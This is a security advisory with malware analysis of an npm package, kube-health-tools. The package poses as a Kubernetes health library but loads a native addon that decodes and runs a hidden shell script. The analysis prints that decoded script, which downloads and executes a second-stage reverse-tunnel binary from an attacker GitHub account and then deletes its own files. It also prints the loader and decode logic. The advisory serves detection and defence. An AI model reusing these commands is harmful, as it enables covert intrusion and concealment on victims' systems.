VDB
GCVE-110-OSM-2026-1247
GCVE-110-OSM-2026-1247
Advisory PublishedCVSS 9.6/10
Masquerades as a Kubernetes node health diagnostics library. index.js silently loads a prebuilt ELF shared object (prebuilt/addon.node) at require() time. The binary is not a legitimate Node.js native addon — it exports NAPI symbols only as a cover, and its sole purpose is to fork a detached child process that XOR-decodes a 922-byte shell script from the binary's .rodata section and executes it. The decoded shell script downloads a second-stage binary from an attacker-controlled GitHub account (gibunxi4201) and executes it with an encrypted config blob piped via stdin, then self-destructs by deleting the binary, the script, and the entire kube-health-tools package from node_modules. Static analysis of the stage-2 binary (kube-diag-linux-amd64-packed, downloaded and analysed without execution) confirms it is a UPX-packed Go binary containing a custom Chisel v3 reverse tunnel rebranded as 'nhc', with TCP/SOCKS5 reverse tunneling, mTLS, and HTTP CONNECT proxy traversal capabilities. The C2 address is passed via the encrypted stdin blob and is not recoverable by static analysis.
index.js: 'try { require("./prebuilt/addon.node") } catch(e) {}'. addon.node (ELF64 x86-64, 15944 bytes, GCC 12.2.0 Debian, libc.so.6 only): exports napi_register_module_v1 and node_api_module_get_api_version_v1. napi_register_module_v1 (Ghidra-decompiled): (1) fork() — parent returns NAPI handle silently; (2) child: setsid(); (3) XOR-decode: auStack_3c8[0]=0x23; for i=1 to 0x39a: auStack_3c8[i] = 'n4k8x2m6'[i&7] ^ obj.E[i]; (4) fopen64('/tmp/.ns','w'), fwrite(decoded, 1, 0x39a, stream), fclose, chmod('/tmp/.ns', 0755); (5) execl('/bin/sh','sh','/tmp/.ns',0). Decoded /tmp/.ns (manually recovered from .rodata at offset 0x2040): curl -sLo /tmp/.kh https://github.com/gibunxi4201/kube-node-diag/releases/download/v2.0/kube-diag-linux-amd64-packed && chmod +x /tmp/.kh && echo 'CBIeViBCCxYSV2lbDUZAQQ...[412-byte encrypted base64 config]...' | /tmp/.kh & ; sleep 3 && rm -f /tmp/.kh /tmp/.ns ; find / -name 'addon.node' -path '*/kube-health-tools/*' -delete 2>/dev/null ; find / -type d -name 'kube-health-tools' -path '*/node_modules/*' -exec rm -rf {} + 2>/dev/null. Stage-2 (kube-diag-linux-amd64-packed): SHA256 1170f882e74551a8d7c11b571029a3356f01516934f910cfd45b89b27edadf65, 2097868 bytes UPX-packed, unpacked SHA256 75f6b09df6839ee71ba9478626a715d1560a669c84a0eb9f442fc7ae78d0359b, 6684992 bytes, Go, stripped. Strings from unpacked binary confirm: 'chisel-v3', 'Usage: nhc client [options] <server> <remote>', 'R:socks', 'NHC_CFG', 'NHC_KEY', 'NHC_KEY_FILE', 'nhc.pid', '--mode=daemon', '/tmp/.nhc.enc', 'StealthConfig', 'DisguiseConfig', 'https://github.com/kubernetes/node-health-check' (fake help text for impersonation). GitHub API confirms attacker account gibunxi4201 (created 2025-06-27, 54 repos, prior Chinese-language VLESS/VMess/Trojan proxy tooling). Release v2.0 published 2026-04-01T03:48:24Z — same day as npm package. 7 confirmed downloads of stage-2 at time of analysis.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | kube-health-tools | — | — |
Browse GCVE Records
73,738 records in the GCVE database · Updated July 19, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.